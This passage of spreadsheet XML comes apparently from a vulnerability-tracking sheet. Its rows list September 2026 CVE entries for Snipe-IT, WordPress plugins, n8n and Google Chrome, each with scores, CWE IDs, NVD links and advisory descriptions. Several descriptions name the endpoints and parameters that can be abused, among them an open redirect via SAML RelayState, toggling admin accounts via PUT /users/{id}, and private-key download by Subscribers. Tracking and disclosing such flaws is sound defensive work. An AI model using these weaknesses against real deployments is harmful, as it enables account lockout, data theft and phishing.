      <c r="C5279" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5279" s="5" t="inlineStr"/>
      <c r="F5279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5279" s="5" t="inlineStr"/>
      <c r="H5279" s="5" t="inlineStr"/>
      <c r="I5279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5279" s="5" t="inlineStr"/>
      <c r="K5279" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5279" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.5.0 through 8.6.3 contains an open redirect vulnerability in its SAML assertion-consumer endpoint (SamlController::acs, POST /saml/acs). The endpoint wrote the RelayState POST parameter directly into Laravel's url.intended session key with only CR/LF characters stripped, and LoginController later issued redirect()-&gt;intended(), which passes an absolute URL through to the Location header unchanged. An unauthenticated attacker who induces a user of a SAML-SSO-enabled instance to visit a crafted IdP-initiated SSO link can therefore cause the victim's browser to be redirected to an arbitrary absolute external URL immediately after a successful authentication, which the advisory notes facilitates credential-harvesting phishing. No account on the target instance and no compromise of the identity provider are required. Only deployments with SAML SSO enabled are affected. Fixed in 8.7.0 (commit d30b73d, PR #19386), which validates RelayState via a new Helper::sameOriginUrl check before storing it.</t>
        </is>
      </c>
      <c r="M5279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86756</t>
        </is>
      </c>
    </row>
    <row r="5280">
      <c r="A5280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86760</t>
        </is>
      </c>
      <c r="C5280" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5280" s="5" t="inlineStr"/>
      <c r="F5280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5280" s="5" t="inlineStr"/>
      <c r="H5280" s="5" t="inlineStr"/>
      <c r="I5280" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5280" s="5" t="inlineStr"/>
      <c r="K5280" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5280" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions 8.2.0 through 8.6.x (fixed in 8.7.0) contain an incorrect authorization flaw in app/Http/Controllers/Users/UsersController::update(). The single-user edit route assigned the activated field from the request payload before evaluating the canEditAuthFields authorization gate, so an authenticated non-admin user holding the users.edit permission in the target's company scope can submit a full valid PUT request to /users/{id} and toggle the activated flag on any user, including admin and superuser accounts. Deactivating an admin locks that account out of the application until another admin or superuser re-enables it. Only the activated field is affected; username, email, password and permissions remain protected by the gate, no data is disclosed, and the API (Api\UsersController::update) and bulk-edit paths are not affected.</t>
        </is>
      </c>
      <c r="M5280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86760</t>
        </is>
      </c>
    </row>
    <row r="5281">
      <c r="A5281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86761</t>
        </is>
      </c>
      <c r="C5281" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5281" s="5" t="inlineStr"/>
      <c r="F5281" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5281" s="5" t="inlineStr"/>
      <c r="H5281" s="5" t="inlineStr"/>
      <c r="I5281" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5281" s="5" t="inlineStr"/>
      <c r="K5281" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5281" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 contain an authorization bypass vulnerability in location print endpoints that fails to enforce per-model authorization checks. Authenticated attackers with location view permission can access printassigned and printallassigned endpoints to retrieve related users, assets, accessories, consumables, and components regardless of their individual model permissions.</t>
        </is>
      </c>
      <c r="M5281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86761</t>
        </is>
      </c>
    </row>
    <row r="5282">
      <c r="A5282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86767</t>
        </is>
      </c>
      <c r="C5282" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5282" s="5" t="inlineStr"/>
      <c r="F5282" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5282" s="5" t="inlineStr"/>
      <c r="H5282" s="5" t="inlineStr"/>
      <c r="I5282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5282" s="5" t="inlineStr"/>
      <c r="K5282" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5282" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to apply company scope filtering to the GET /hardware/requested endpoint when Full Multiple Company Support is enabled, allowing authenticated users with assets.view permission to read pending asset requests from all companies. Attackers can retrieve cross-tenant data including requested asset names, requester display names and profile links, locations, and expected check-in dates without parameter manipulation.</t>
        </is>
      </c>
      <c r="M5282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86767</t>
        </is>
      </c>
    </row>
    <row r="5283">
      <c r="A5283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86768</t>
        </is>
      </c>
      <c r="C5283" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5283" s="5" t="inlineStr"/>
      <c r="F5283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5283" s="5" t="inlineStr"/>
      <c r="H5283" s="5" t="inlineStr"/>
      <c r="I5283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5283" s="5" t="inlineStr"/>
      <c r="K5283" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5283" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate soft-deleted state in API checkout endpoints, allowing authenticated users with checkout permissions to bind live inventory to trashed targets. Attackers can submit POST requests to hardware, component, or consumable checkout endpoints with soft-deleted user, asset, or location IDs to create orphaned references that corrupt the asset ledger and audit trails.</t>
        </is>
      </c>
      <c r="M5283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86768</t>
        </is>
      </c>
    </row>
    <row r="5284">
      <c r="A5284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86769</t>
        </is>
      </c>
      <c r="C5284" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5284" s="5" t="inlineStr"/>
      <c r="F5284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5284" s="5" t="inlineStr"/>
      <c r="H5284" s="5" t="inlineStr"/>
      <c r="I5284" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5284" s="5" t="inlineStr"/>
      <c r="K5284" s="5" t="inlineStr">
        <is>
          <t>CWE-282</t>
        </is>
      </c>
      <c r="L5284" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain an improper ownership management vulnerability in the consumables checkout API endpoint that records the checkout target user's id in the created_by column instead of the authenticated caller's id. Authenticated attackers with consumables.checkout permission can perform checkouts that result in misattributed audit trail entries in the consumables_users pivot table, obscuring which operator performed the action.</t>
        </is>
      </c>
      <c r="M5284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86769</t>
        </is>
      </c>
    </row>
    <row r="5285">
      <c r="A5285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86773</t>
        </is>
      </c>
      <c r="C5285" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5285" s="5" t="inlineStr"/>
      <c r="F5285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5285" s="5" t="inlineStr"/>
      <c r="H5285" s="5" t="inlineStr"/>
      <c r="I5285" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5285" s="5" t="inlineStr"/>
      <c r="K5285" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5285" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through version 8.6.3 fails to perform object-level authorization in the updateLicense, updateConsumable, updateAccessory, and updateModel endpoints and in the storeModel endpoint for Predefined Kits. The existing check authorizes only the parent Predefined Kit (update on PredefinedKit) and not the child object being attached. As a result, an authenticated user holding only the kits.edit permission can attach a License, Consumable, Accessory, or Asset Model that they are otherwise denied (HTTP 403) from reading directly to a Predefined Kit, and the kit relation index then discloses the attached object's name back to that low-privilege user. This is the update-path and storeModel counterpart to CVE-2026-55478, which fixed only the storeLicense, storeConsumable, and storeAccessory methods in 8.6.2. Note that updateModel was code-vulnerable in 8.6.3 but not reachable in practice because a route-name typo bound the route to a nonexistent controller method, causing HTTP 500 responses. The issue is fixed in Snipe-IT 8.7.0.</t>
        </is>
      </c>
      <c r="M5285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86773</t>
        </is>
      </c>
    </row>
    <row r="5286">
      <c r="A5286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86774</t>
        </is>
      </c>
      <c r="C5286" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5286" s="5" t="inlineStr"/>
      <c r="F5286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5286" s="5" t="inlineStr"/>
      <c r="H5286" s="5" t="inlineStr"/>
      <c r="I5286" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5286" s="5" t="inlineStr"/>
      <c r="K5286" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5286" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a broken access control vulnerability in AssetModelPolicy where the files() method cascades from assets.files permission, allowing authenticated users to upload and delete file attachments on Asset Model records without the required models.files permission. Attackers with only assets.files permission can mutate shared model file attachments across company boundaries and bypass the dedicated models.files permission intended to restrict file management on the shared Asset Model catalog.</t>
        </is>
      </c>
      <c r="M5286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86774</t>
        </is>
      </c>
    </row>
    <row r="5287">
      <c r="A5287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86781</t>
        </is>
      </c>
      <c r="C5287" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5287" s="5" t="inlineStr"/>
      <c r="F5287" s="5" t="inlineStr"/>
      <c r="G5287" s="5" t="inlineStr"/>
      <c r="H5287" s="5" t="inlineStr"/>
      <c r="I5287" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5287" s="5" t="inlineStr"/>
      <c r="K5287" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L5287" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects WordPress plugin before 4.7.40 does not perform capability or nonce checks on a certificate-file download routine that runs early in the WordPress admin request lifecycle, allowing any authenticated user, including Subscribers, to download the site's TLS private key, certificates, and diagnostic logs.</t>
        </is>
      </c>
      <c r="M5287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86781</t>
        </is>
      </c>
    </row>
    <row r="5288">
      <c r="A5288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86809</t>
        </is>
      </c>
      <c r="C5288" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5288" s="5" t="inlineStr"/>
      <c r="F5288" s="5" t="inlineStr"/>
      <c r="G5288" s="5" t="inlineStr"/>
      <c r="H5288" s="5" t="inlineStr"/>
      <c r="I5288" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5288" s="5" t="inlineStr"/>
      <c r="K5288" s="5" t="inlineStr"/>
      <c r="L5288" s="5" t="inlineStr">
        <is>
          <t>The Persian Elementor WordPress plugin from 2.7.10 before 2.8.2 does not verify that the payment authority returned to its ZarinPal payment callback belongs to the transaction being completed, allowing unauthenticated attackers to complete a pending order using a valid payment authority obtained from a different transaction.</t>
        </is>
      </c>
      <c r="M5288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86809</t>
        </is>
      </c>
    </row>
    <row r="5289">
      <c r="A5289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86994</t>
        </is>
      </c>
      <c r="C5289" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5289" s="5" t="inlineStr"/>
      <c r="F5289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5289" s="5" t="inlineStr"/>
      <c r="H5289" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I5289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5289" s="5" t="inlineStr"/>
      <c r="K5289" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5289" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the /rest/active-workflows endpoint returned every active workflow ID on the instance to any member regardless of sharing. Workflow activation, deactivation, and publication push events were also broadcast to clients that could not access the affected workflow, disclosing workflow IDs, version IDs, and activation error details. The affected paths include packages/cli/src/services/active-workflows.service.ts and packages/cli/src/workflows/workflow-push-notifier.service.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M5289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t>
        </is>
      </c>
    </row>
    <row r="5290">
      <c r="A5290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86995</t>
        </is>
      </c>
      <c r="C5290" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5290" s="5" t="inlineStr"/>
      <c r="F5290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5290" s="5" t="inlineStr"/>
      <c r="H5290" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I5290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5290" s="5" t="inlineStr"/>
      <c r="K5290" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L5290" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node validated the repository parameter for fetch or pull, but setUpstream wrote a branch..remote value into repository configuration without validating it. A later fetch or pull resolved the remote from that configuration instead of the checked parameter. An authenticated workflow editor could therefore point Git at any local repository readable by the n8n process and receive its contents through packages/nodes-base/nodes/Git/GenericFunctions.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M5290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t>
        </is>
      </c>
    </row>
    <row r="5291">
      <c r="A5291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86996</t>
        </is>
      </c>
      <c r="C5291" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5291" s="5" t="inlineStr"/>
      <c r="F5291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5291" s="5" t="inlineStr"/>
      <c r="H5291" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I5291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5291" s="5" t="inlineStr"/>
      <c r="K5291" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5291" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the workflow setting named This workflow can be called by was enforced by the Execute Workflow node but not when a workflow was attached to an Agent as a tool. A user able to build an Agent could invoke a restricted workflow and read its returned data. The affected path is packages/cli/src/modules/agents/tools/workflow-tool-factory.ts, where executeWorkflow omitted SubworkflowPolicyChecker.checkForProject. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M5291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t>
        </is>
      </c>
    </row>
    <row r="5292">
      <c r="A5292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87435</t>
        </is>
      </c>
      <c r="C5292" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5292" s="5" t="inlineStr"/>
      <c r="F5292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5292" s="5" t="inlineStr"/>
      <c r="H5292" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5292" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5292" s="5" t="inlineStr"/>
      <c r="K5292" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5292" s="5" t="inlineStr">
        <is>
          <t>Information leak in ControlledFrame in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87435</t>
        </is>
      </c>
    </row>
    <row r="5293">
      <c r="A5293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87439</t>
        </is>
      </c>
      <c r="C5293" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5293" s="5" t="inlineStr"/>
      <c r="F5293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5293" s="5" t="inlineStr"/>
      <c r="H5293" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5293" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5293" s="5" t="inlineStr"/>
      <c r="K5293" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5293" s="5" t="inlineStr">
        <is>
          <t>Information leak in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87439</t>
        </is>
      </c>
    </row>
    <row r="5294">
      <c r="A5294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87453</t>
        </is>
      </c>
      <c r="C5294" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5294" s="5" t="inlineStr"/>
      <c r="F5294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5294" s="5" t="inlineStr"/>
      <c r="H5294" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5294" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5294" s="5" t="inlineStr"/>
      <c r="K5294" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L5294" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in BackgroundFetch in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to leak sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87453</t>
        </is>
      </c>
    </row>
    <row r="5295">
      <c r="A5295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87518</t>
        </is>
      </c>
      <c r="C5295" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5295" s="5" t="inlineStr"/>
      <c r="F5295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5295" s="5" t="inlineStr"/>
      <c r="H5295" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I5295" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5295" s="5" t="inlineStr"/>
      <c r="K5295" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5295" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Safebrowsing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87518</t>
        </is>
      </c>
    </row>
    <row r="5296">
      <c r="A5296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87523</t>
        </is>
      </c>
      <c r="C5296" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5296" s="5" t="inlineStr"/>
      <c r="F5296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5296" s="5" t="inlineStr"/>
      <c r="H5296" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5296" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5296" s="5" t="inlineStr"/>
      <c r="K5296" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5296" s="5" t="inlineStr">
        <is>
          <t>Race condition in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87523</t>
        </is>
      </c>
    </row>
    <row r="5297">
      <c r="A5297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87566</t>
        </is>
      </c>
      <c r="C5297" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5297" s="5" t="inlineStr"/>
      <c r="F5297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5297" s="5" t="inlineStr"/>
      <c r="H5297" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5297" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5297" s="5" t="inlineStr"/>
      <c r="K5297" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5297" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Layout in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87566</t>
        </is>
      </c>
    </row>
    <row r="5298">
      <c r="A5298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87594</t>
        </is>
      </c>
      <c r="C5298" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5298" s="5" t="inlineStr"/>
      <c r="F5298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5298" s="5" t="inlineStr"/>
      <c r="H5298" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5298" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5298" s="5" t="inlineStr"/>
      <c r="K5298" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5298" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87594</t>
        </is>
      </c>
    </row>
    <row r="5299">
      <c r="A5299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87605</t>
        </is>
      </c>
      <c r="C5299" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5299" s="5" t="inlineStr"/>
      <c r="F5299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5299" s="5" t="inlineStr"/>
      <c r="H5299" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5299" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5299" s="5" t="inlineStr"/>
      <c r="K5299" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5299" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Contacts in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
